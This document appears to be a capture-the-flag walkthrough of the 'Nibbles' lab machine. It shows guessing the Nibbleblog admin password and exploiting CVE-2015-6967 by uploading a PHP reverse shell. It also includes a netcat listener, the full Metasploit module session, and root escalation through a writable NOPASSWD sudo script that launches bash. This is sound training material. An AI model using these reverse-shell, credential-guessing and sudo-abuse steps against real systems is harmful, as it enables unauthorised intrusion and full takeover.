We get back the following result showing that two ports are open:
Port 80: running Apache httpd 2.4.18
Port 22: running OpenSSH 7.2p2
Enumeration: Website - Port 80
Nothing useful there, so right click and select View Page Source. We find a comment that gives us a new directory. CTRL + U
This leads us to the following page. You can see at the bottom that it is powered by Nibbleblog. This is an indication that it an off the shelf software as apposed to custom software.
Digging deeper, there’s a page at /nibbleblog/content/private/users.xml which reveals a user, admin, as well as the IPs that have tried to log in as it:
http://10.10.10.75/nibbleblog/update.php
DB updated: ./content/private/config.xml
DB updated: ./content/private/comments.xml
http://10.10.10.75/nibbleblog/README
Version: v4.0.3
===== About the author =====
Name: Diego Najar E-mail: dignajar@gmail.com
Linkedin: http://www.linkedin.com/in/dignajar
I wasn’t able to locate a password elsewhere on the blog, and nibbleblog doesn’t have a default password. Luckily, the guess of nibbles worked, and we are in:
Remote Code Execution (via file upload):
From the gobuster results, there’s a README file, and that gives us a version:
This version of nibbleblog is vulnerable to CVE-2015-6967, which is an authenticated arbitrary file upload, which can lead to code execution. There’s both a metasploit modules, and it’s pretty straightforwards to do manually.
CVE-2015-6967:
Now we need admin credentials. When I’m presented with an enter credentials page, the first thing I try is common credentials (admin/admin, admin/nibbles, nibbles/nibbles, nibbles/admin). If that doesn’t work out, I look for default credentials online that are specific to the technology. Last, I use a password cracker if all else fails.
Next, we need to navigate to the My Image plugin. Click on Plugins > My image > Configure.
Get the code for a PHP reverse shell. Change the IP address and port used by your attack machine. Then save it in a file called image.php and upload it on the site.
Start a listener on the above chosen port.
┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555
In the browser, navigate to the image we just uploaded to run the reverse shell script.
┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.75] 57330
Let’s first upgrade to a better shell. Python is not installed but python 3 is.
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
Metasploit –> Meterpreter
We’ll use multi/http/nibbleblog_file_upload to get a shell on the box.
┌──(kali💀kali)-[~]
└─$ msfconsole
msf6 > use multi/http/nibbleblog_file_upload
msf6 exploit(multi/http/nibbleblog_file_upload) > info
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.16.4
msf6 exploit(multi/http/nibbleblog_file_upload) > run
meterpreter > shell
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
user.txt:
From there, we’ll upgrade our shell, and then get user.txt:
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home
nibbler@Nibbles:/home$ cd nibbler
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
455db----------------------------------
Privilege Escalation
Find out what privileges you have. Either through running LinEnum.sh or just by checking sudo -l, we’ll see the following:
nibbler@Nibbles:/home/nibbler$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
But if we go and try to access it we will find that the personal directory does not exist! But that's not the end we can still create it and use it:
cd /home/nibbler
mkdir personal
mkdir stuff
cd /home/nibbler/personal/stuff
okay now we have the directories ready, lets create our script, nano does not exist, we will need to use vi text editor:
nibbler@Nibbles:/home/nibbler/personal/stuff$ vi monitor.sh
when the vi is open, press i and enter, then paste this shell:
#!/bin/sh
bash
then press ESC from your keyboard, and type :wq to save and exit then press enter: